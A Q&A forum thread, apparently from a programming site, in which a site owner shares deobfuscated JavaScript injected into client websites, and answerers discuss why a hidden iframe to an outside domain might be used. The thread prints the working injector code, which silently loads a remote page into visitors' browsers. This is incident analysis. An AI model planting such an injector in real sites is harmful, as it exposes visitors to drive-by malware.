# Malicious JavaScript-Code injected - but doing nothing malicious?

Tags: javascript, security, iframe

I recently discoverd some evil code in some of my clients websites. These snippets where PHP-based and JS-based and were injected because a trojan-virus logged some ftp-credentials. However, the code was obfuscated and as I eval'd it (safely), it looks like this:

```
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://www.bahnmotive.de/index.htm' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src','http://www.bahnmotive.de/index.htm');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
```

As you can see, the URL bahnmotive.de is included in the page as in invisible iframe. This website does not contain any harmful data (at least not today anymore), so I ask myself (and you): Why should someone link to a site in an invisible iframe and not doing some other evil things? My first guess is, that there is a SEO-Agency which promised a lot of traffic on their clients website bahnmotive.de and accomplished that because of this trojan-virus.
Could that be? I did a research in Google, but found nothing about this, so I wanted to ask some of the pro's here. Perhaps you can point me to another forum where this topic can be discussed.

Comment: Seems like you're not the only one: https://www.google.com/search?hl=en&q=%22http%3A%2F%2Fwww.bahnmotive.de%2Findex.htm%22

Answer (score 0, accepted):

It's quite possible that the webpage is sniffing `HTTP_REFERER` to ensure users are coming from a link in order to disguise the attack from other outside individuals.

Other considerations:

- it's dormant and waiting for another time to activate
- it is an SEO builder, as you stated, increasing the external link count
- the website is currently active and doing something hazardous, which you haven't yet detected (it could have covered its tracks, or it could be targeting different browsers)
- someone attempted to do something bad, but failed

Answer (score 3):

User-agent and plugins' presence may be inspected at that url and exploit sent only to users with vulnerable browser.

Do not underestimate bad guys.

Comment: and they may just be waiting until some future time to do more evil.

Comment: Well that makes sense! Didn't ever thought on that :-)

Answer (score 0):

An exploit could be:

- Time-bounded: set to be enabled at some future time. Until then, they could assess the spread of infection by logging addresses
- Time-bounded: did have an infection but it is now cleared. This is still a risk as an attacker could place malware on that server again in future
- Browser-specific: as @kirilloid pointed out, it is easy to check for specific browser signatures and only server malware to browsers that match

It may not be an exploit as such - as you mentioned in the question it could be an SEO scheme to drive traffic. This may not affect you maliciously, but is still a compromise, and the JS should be cleaned just in case it develops as per the 3 possibilities above.

Answer (score 0):

That submission could have also been a scanner for which websites do not properly validate the string data.  That information could then be used later in a real attack as others have said.